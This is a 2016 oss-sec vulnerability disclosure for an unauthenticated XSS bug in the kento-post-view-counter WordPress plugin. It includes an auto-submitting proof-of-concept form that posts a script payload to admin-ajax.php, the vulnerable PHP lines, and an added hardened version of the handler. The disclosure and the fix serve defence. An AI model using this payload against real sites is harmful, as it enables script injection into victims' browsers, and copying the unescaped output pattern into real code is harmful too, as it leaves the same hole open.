oss-sec mailing list archives
Unauthenticated XSS Vulnerability in kento-post-view-counter Wordpress Plugin 2.8
From: shravan kumar <cor3sm4sh3r () gmail com>
Date: Sat, 16 Apr 2016 13:41:31 +0530
I would like to disclose an unauthenticated XSS vulnerability in the kento-post-view-counter plugin, version 2.8. The plugin can be found at https://wordpress.org/plugins/kento-post-view-counter/

This bug can be triggered by an unauthenticated or authenticated user. If a user is sent a URL by social engineering and the user clicks the link, the bug can be triggered. The URL should be something like this: http://attackerssite.com/XSS_POC.html

The code for XSS_POC.html is as follows:

    <html>
    <body onload="document.forms['xss'].submit()">
    <form name="xss" action="http://targetsite/wp-admin/admin-ajax.php" method="POST">
    <input type="hidden" name="action" value="kento_pvc_top_geo" />
    <input type="hidden" name="kento_pvc_geo" value=" <script>alert(1);</script>" />
    <input type="submit" value="Submit" />
    </form>
    </body>
    </html>

Technical Details:

The vulnerable page is wp-content/plugins/kento-post-view-counter/index.php

The code responsible for the vulnerability, line no. 219 onwards:

    if(isset($_POST['kento_pvc_geo']))
    {
        $geo = $_POST['kento_pvc_geo'];
    }
    if(empty($geo))
    {
        $geo = "country";
    }
    .....
    ....

Line no. 240:

    $top_geo .= "<th scope='col' class='manage-column column-name' ><strong>" . ucfirst($geo) . "</strong></th>";

Line no. 245:

    $top_geo .= "<th scope='col' class='manage-column column-name' ><strong>" . ucfirst($geo) . "</strong></th>";

Line no. 283:

    echo $top_geo;

The $top_geo parameter is displayed in an unsafe manner, without escaping HTML characters.

The vulnerable POST parameter is:

- kento_pvc_geo

--
Shravan Kumar
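As an added illustration (not from the report above and not the plugin's own code), the unescaped-output pattern quoted from index.php beside a hardened form of the same handler. The allow-list values, the nonce action name and the capability used are assumptions; the WordPress functions themselves (esc_html, sanitize_key, wp_unslash, check_ajax_referer, current_user_can) are real.

```php
<?php
// Added example, not the plugin's code. Requires WordPress to be loaded.

// --- Vulnerable pattern, as reported (lines 219-283 of index.php) ---
function kento_top_geo_vulnerable() {
    $geo = '';
    if (isset($_POST['kento_pvc_geo'])) {
        $geo = $_POST['kento_pvc_geo'];          // request-controlled, unfiltered
    }
    if (empty($geo)) {
        $geo = 'country';
    }
    // ucfirst() does not neutralise markup: a <script> payload survives into the page.
    return "<th scope='col' class='manage-column column-name'><strong>"
         . ucfirst($geo) . "</strong></th>";
}

// --- Hardened form (allow-list values are an assumption) ---
function kento_top_geo_hardened() {
    $allowed = array('country', 'city', 'region');   // assumed set of valid columns
    $geo = isset($_POST['kento_pvc_geo'])
        ? sanitize_key(wp_unslash($_POST['kento_pvc_geo']))  // [a-z0-9_-] only
        : 'country';
    if (!in_array($geo, $allowed, true)) {
        $geo = 'country';                              // reject anything unexpected
    }
    // Escape at the output sink regardless of the allow-list above.
    return "<th scope='col' class='manage-column column-name'><strong>"
         . esc_html(ucfirst($geo)) . "</strong></th>";
}

// Hardened admin-ajax entry point (nonce action name and capability are assumptions).
function kento_top_geo_ajax_hardened() {
    // Dies with HTTP 403 unless a valid nonce is posted as 'security';
    // this also defeats the cross-site auto-submitting form shown in the report.
    check_ajax_referer('kento_pvc_top_geo_nonce', 'security');
    if (!current_user_can('manage_options')) {
        wp_send_json_error('forbidden', 403);
    }
    echo kento_top_geo_hardened();
    wp_die();
}
// Registered only for logged-in users: no wp_ajax_nopriv_ hook, so unauthenticated
// requests to admin-ajax.php?action=kento_pvc_top_geo are not served at all.
add_action('wp_ajax_kento_pvc_top_geo', 'kento_top_geo_ajax_hardened');
```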